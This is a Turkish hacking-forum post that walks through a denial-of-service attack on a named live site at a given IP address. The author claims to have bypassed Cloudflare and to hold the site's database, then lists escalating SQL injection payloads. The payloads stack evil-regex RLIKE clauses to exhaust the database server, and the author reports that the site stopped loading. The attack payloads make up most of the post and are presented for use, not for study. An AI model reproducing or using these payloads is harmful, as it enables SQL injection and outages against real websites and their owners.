[ame]https://www.youtube.com/watch?v=eLzVNkzUvtQ[/ame]
her şeyden önce bu açığı kullanabilmek için cloudflare bypass edip gerçek iplerini bulmamız gerekiyor. hiç de zor değil.
zaten bu sitenin database'i elimde. linke giriyoruz.
http://46.166.160.204/tr/?option=com_media&view=images
içinde tek bir evil-regex geçen sorgumuzu çalıştıralım. bakalım kaç saniye sürecek?
Kod:
'||(SELECT 'www.turkhackteam.org' FROM DUAL WHERE 1=1 AND ORD(MID((SELECT COUNT(id) FROM articles WHERE content RLIKE "^((ab)*)+$") FROM 1 FOR 1))>51)||'
şimdi aynı sorguyu iki kez yapan başka bir sorgu deneyelim. işlem süresinin uzaması lazım.
Kod:
'||(SELECT 'www.turkhackteam.org' FROM DUAL WHERE 1=1 AND ORD(MID((SELECT COUNT(id) FROM articles WHERE content RLIKE "^((ab)*)+$" or content RLIKE "^((ac)*)+$") FROM 1 FOR 1))>51)||'
sorguyu uzatalım. uzatalım ki aynı sorguyu onlarca kez uygulayıp re-dosumuzu gerçekleştirelim.
Kod:
'||(SELECT 'www.turkhackteam.org' FROM DUAL WHERE 1=1 AND ORD(MID((SELECT COUNT(id) FROM articles WHERE content RLIKE "^((ab)*)+$" or content RLIKE "^((ac)*)+$" or content RLIKE "^((ad)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ab)*)+$" or content RLIKE "^((ac)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ab)*)+$" or content RLIKE "^((ac)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ae)*)+$" or content RLIKE "^((ab)*)+$" or content RLIKE "^((ac)*)+$") FROM 1 FOR 1))>51)||'bir kaç f5 yapmaktan zarar gelmez. yaklaşık 10-15 kez f5 yaptım. şimdi siteye tekrar bakalım. açılıyor mu?
gördüğünüz gibi sadece header kısmı yüklendi, sql sunucusuna çok yük bindiği için sitenin aslı yüklenemedi.
